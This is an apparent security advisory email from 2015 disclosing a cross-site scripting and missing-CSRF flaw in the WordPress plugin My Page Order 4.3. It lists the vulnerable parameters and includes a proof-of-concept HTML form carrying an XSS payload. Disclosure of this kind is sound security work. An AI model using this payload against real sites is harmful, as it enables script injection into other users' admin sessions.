Subject: Cross-Site Scripting (XSS) in My Page Order 4.3
Date: Thu, 13 Aug 2015 18:09:43 +0200

Hello,

Plugin: My Page Order 4.3 https://wordpress.org/plugins/my-page-order/

1. Cross-Site Scripting (XSS) 

Authenticated users (like editors) can inject html/js code (there is no CSRF protection).

Method: POST
Url: http://localhost/wp-admin/edit.php?post_type=page&page=mypageorder
Vulnerable parameters: pages, hdnParentID

Example PHP callstack:
mypageorder   [/tmp/wpplugin/my-page-order/mypageorder.php:105]

Verification:
--
<form method="POST" action="http://localhost/wp-admin/edit.php?post_type=page&page=mypageorder">
<input type="text" name="btnSubPages" value="1" />
<input type="text" name="pages" value='"><img src=x onerror=alert(1) />' />
<input type="submit" />
</form>
--

--
Regards,
Marcin Probola,